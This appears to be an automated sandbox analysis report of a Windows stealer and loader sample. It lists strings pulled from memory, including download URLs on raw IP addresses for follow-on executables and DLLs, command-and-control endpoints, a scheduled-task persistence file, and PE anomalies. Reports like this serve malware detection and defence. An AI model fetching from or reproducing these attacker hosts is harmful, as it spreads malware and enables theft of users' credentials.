Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeAppData
Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5d7%
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php%H
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hn
Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpXo
Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phps
Source: explorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu
Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/.
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dlle
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dllP
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll%U
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dllY
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INF
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/845-40f1-ac21-573d1d5ce43f
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php%
Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php5
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpB6
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php_
Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpz
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/EM32
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/Z
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309899894.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: HIEHDAFH.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: HIEHDAFH.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HIEHDAFH.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HIEHDAFH.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HIEHDAFH.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://support.mozilla.org
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: HIEHDAFH.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://www.mozilla.org
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://www.mozilla.org#
Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2271711490.000000000113A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2271711490.000000000113A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name:
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name: .idata
Source: HCGCBFHCFC.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
PE file has nameless sections
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Source: a62ee169b8.exe.10.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CA1B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CA1B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CA1B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9BF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B35A0 0_2_6C9B35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA134A0 0_2_6CA134A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1C4A0 0_2_6CA1C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C6C80 0_2_6C9C6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DD4D0 0_2_6C9DD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C64C0 0_2_6C9C64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F6CF0 0_2_6C9F6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BD4E0 0_2_6C9BD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2542B 0_2_6CA2542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F5C10 0_2_6C9F5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2AC00 0_2_6CA2AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA02C10 0_2_6CA02C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C5440 0_2_6C9C5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2545C 0_2_6CA2545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F0DD0 0_2_6C9F0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA185F0 0_2_6CA185F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E0512 0_2_6C9E0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DED10 0_2_6C9DED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CFD00 0_2_6C9CFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA14EA0 0_2_6CA14EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D5E90 0_2_6C9D5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1E680 0_2_6CA1E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA276E3 0_2_6CA276E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BBEF0 0_2_6C9BBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CFEF0 0_2_6C9CFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F7E10 0_2_6C9F7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA19E30 0_2_6CA19E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA05600 0_2_6CA05600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA26E63 0_2_6CA26E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D9E50 0_2_6C9D9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F3E50 0_2_6C9F3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D4640 0_2_6C9D4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BC670 0_2_6C9BC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA02E4E 0_2_6CA02E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA077A0 0_2_6CA077A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E6FF0 0_2_6C9E6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BDFE0 0_2_6C9BDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F7710 0_2_6C9F7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C9F00 0_2_6C9C9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E60A0 0_2_6C9E60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA250C7 0_2_6CA250C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DC0E0 0_2_6C9DC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F58E0 0_2_6C9F58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA04820 0_2_6CA04820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C7810 0_2_6C9C7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FB820 0_2_6C9FB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D8850 0_2_6C9D8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DD850 0_2_6C9DD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FF070 0_2_6C9FF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F5190 0_2_6C9F5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9ED9B0 0_2_6C9ED9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA12990 0_2_6CA12990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BC9A0 0_2_6C9BC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA0B970 0_2_6CA0B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2B170 0_2_6CA2B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9DA940 0_2_6C9DA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CD960 0_2_6C9CD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA22AB0 0_2_6CA22AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CCAB0 0_2_6C9CCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA2BA90 0_2_6CA2BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B22A0 0_2_6C9B22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9E4AA0 0_2_6C9E4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F8AC0 0_2_6C9F8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D1AF0 0_2_6C9D1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FE2F0 0_2_6C9FE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9F9A60 0_2_6C9F9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BF380 0_2_6C9BF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA253C8 0_2_6CA253C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9FD320 0_2_6C9FD320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B5340 0_2_6C9B5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CC370 0_2_6C9CC370
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DAE410 10_2_00DAE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DA4CD0 10_2_00DA4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DE3048 10_2_00DE3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DD7D63 10_2_00DD7D63
